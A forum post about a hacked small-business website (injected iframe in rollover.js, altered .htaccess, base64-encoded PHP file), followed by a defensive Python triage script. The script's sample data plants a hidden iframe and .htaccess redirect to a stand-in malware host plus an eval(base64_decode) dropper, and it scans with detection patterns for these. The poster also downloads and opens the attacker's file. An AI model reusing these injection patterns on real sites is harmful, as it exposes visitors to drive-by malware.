Long story short: a website that was put up for a small local business was hacked. They gained access to the .htaccess file and inserted something there, and they edited the rollover.js file in the assets directory and inserted an iframe line there.
What I did in response:
Replaced ALL of the website with a fresh copy just to be safe.
BUT, about a day or so later it was infected again.
SO, I dug a little deeper and did this:
Saved the rollover.js file and compared it to a clean one; found the malware string in the first line or two. Replaced the bad file with a clean one, did some research, and generated a NEW .htaccess file and replaced the one that was there. I also found a base64-encoded PHP file named default.php (lazy asshats), and I did not think there was any need to have a PHP file that was base64-encoded (back in the Mac days of newsgroups), so I renamed it defaultpossiblyinfected.php, or I just removed it, period. It was not in the root directory, but with the .htaccess file. I also saw that there was one user listed in the .htpasswd (or whatever it is called) file, and the user and pass did not match what I had changed anything to; the user matched, but the pass was different. I think that might have been an old PW, but the site has had a new PW assigned to it. I also used my FTP client to remove WRITE access to all of the web files, and I think even some of the other files in the urchin5 directory are also write-protected. When I generated a new .htaccess file I think I was able to somewhat protect the .htaccess file and some other stuff.
Is this sufficient? I hate that it happened on my watch, and I have this feeling that there is more I can do to lock the site down. It is being run from AT&T webhosting (not my choice, it is free), and oh, I just realized that I will need to change the password for the FTP backup that takes place each week at the store. Anyways, it is an Apache server, I believe, and I found a few sites that talk about the .htaccess file, but I think I need a good ebook on how to lock down a website like that. I only have one PHP script, and it looks like that file was not messed with, but it is used to send an e-mail for a contact form.
On top of that, I followed the domain listed in the iframe trj and found it belonged to some asshats in west Africa (ZA). I found a reference to a file there, so I made a DOC file with the link, then saved it as an htm file, then opened it and saved the file that was mentioned, and then I opened it up to view it. It is an odd file; it is named differently than what the html file is on the link, but it looks like some sort of google_com or something that has a lot of Google stuff in it.
Anyways, any words of advice from seasoned website vets or security pros? OR a link to an ebook, or even a good ebook title, would be sufficient. TIA
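The checks the poster describes by hand (comparing rollover.js against a clean copy, spotting a base64-encoded PHP file dropped next to .htaccess, stripping write access) can be scripted so the whole web root gets the same treatment after each restore. The script below is an added example, not the poster's code or anything from the thread: it hashes a live copy against a known-clean copy, greps web files for injected (and hidden) iframes, flags the eval(base64_decode(...)) shape in PHP, and reports files that are group- or world-writable. The site layout, file contents and the malware domain in build_sample() are constructed for the example, and the permission check assumes a Unix-style host where mode bits are meaningful.

```python
"""Post-compromise triage of a web root against a known-clean copy.

Added example for the post above; all paths, file contents and the iframe
domain in build_sample() are constructed, not taken from any real site.
"""
import hashlib
import os
import re
import stat
import tempfile
from pathlib import Path

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# Attributes attackers use to keep an injected frame invisible to visitors.
HIDDEN_RE = re.compile(
    r"(?:width|height)\s*=\s*[\"']?0\b|visibility\s*:\s*hidden|display\s*:\s*none",
    re.IGNORECASE,
)
# Decode-then-execute calls typical of an obfuscated PHP dropper or backdoor.
PHP_SUSPICIOUS_RE = re.compile(
    r"\b(eval|base64_decode|gzinflate|str_rot13|assert)\s*\(", re.IGNORECASE
)
WEB_SUFFIXES = {".js", ".html", ".htm", ".php"}


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def hash_tree(root: Path) -> dict[str, str]:
    """Relative POSIX path -> sha256 for every regular file under root (dotfiles included)."""
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def diff_against_clean(live: Path, clean: Path) -> dict[str, list[str]]:
    """Which files changed, appeared, or vanished relative to the clean copy."""
    live_h, clean_h = hash_tree(live), hash_tree(clean)
    return {
        "modified": sorted(p for p in live_h if p in clean_h and live_h[p] != clean_h[p]),
        "added": sorted(p for p in live_h if p not in clean_h),
        "missing": sorted(p for p in clean_h if p not in live_h),
    }


def scan_file(path: Path) -> list[str]:
    """Human-readable findings for one file; an empty list means nothing seen."""
    findings: list[str] = []
    suffix = path.suffix.lower()
    if suffix in WEB_SUFFIXES:
        text = path.read_text(encoding="utf-8", errors="replace")
        for m in IFRAME_RE.finditer(text):  # legitimate iframes show up too; triage them
            tag = m.group(0)
            kind = "hidden iframe" if HIDDEN_RE.search(tag) else "iframe"
            findings.append(f"{kind}: {tag[:80]}")
        if suffix == ".php":
            calls = sorted({m.group(1).lower() for m in PHP_SUSPICIOUS_RE.finditer(text)})
            if calls:
                findings.append("suspicious php calls: " + ", ".join(calls))
    mode = path.stat().st_mode
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"group/world writable (mode {stat.S_IMODE(mode):04o})")
    return findings


def scan_tree(root: Path) -> dict[str, list[str]]:
    """Findings keyed by relative path; clean files are omitted."""
    out: dict[str, list[str]] = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and (found := scan_file(p)):
            out[p.relative_to(root).as_posix()] = found
    return out


def triage(live: Path, clean: Path) -> dict:
    return {"diff": diff_against_clean(live, clean), "scan": scan_tree(live)}


def build_sample() -> tuple[Path, Path]:
    """Construct a clean tree and a tampered live tree under a temp dir (sample data only)."""
    base = Path(tempfile.mkdtemp(prefix="webroot-triage-"))
    clean, live = base / "clean", base / "live"
    rollover = "function rollover(img, src) { img.src = src; }\n"
    contact = "<?php mail('owner@example.invalid', 'Contact', $_POST['msg']); ?>\n"
    htaccess = "Options -Indexes\n"
    index = "<html><body>Hello</body></html>\n"
    files = {
        clean / "assets" / "rollover.js": rollover,
        clean / "contact.php": contact, clean / ".htaccess": htaccess, clean / "index.html": index,
        # live copy: iframe prepended to rollover.js, .htaccess altered, obfuscated default.php dropped
        live / "assets" / "rollover.js":
            "document.write('<iframe src=\"http://malware.example.invalid/in.php\" "
            "width=0 height=0 style=\"visibility:hidden\"></iframe>');\n" + rollover,
        live / "contact.php": contact, live / "index.html": index,
        live / ".htaccess": htaccess + "RewriteRule ^ http://malware.example.invalid/ [R]\n",
        live / "urchin5" / "default.php": "<?php eval(base64_decode('cGhwaW5mbygpOw==')); ?>\n",
    }
    for path, content in files.items():
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text(content, encoding="utf-8")
        os.chmod(path, 0o644)
    os.chmod(live / "urchin5" / "default.php", 0o666)  # left writable, as the poster found
    return live, clean


if __name__ == "__main__":
    live_dir, clean_dir = build_sample()
    report = triage(live_dir, clean_dir)
    for key, paths in report["diff"].items():
        print(f"{key}: {paths}")
    for rel, found in report["scan"].items():
        for line in found:
            print(f"{rel}: {line}")
```

Run it against a real site by pointing triage() at the live web root (fetched over FTP) and the clean copy from the last known-good backup; anything in "added" or "modified" that you did not change yourself, plus every "suspicious php calls" hit, is what to pull and inspect before restoring. A hit on a file you did not touch after a fresh restore, like the poster's re-infection a day later, points at a credential or hosting-side problem rather than at the files themselves.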

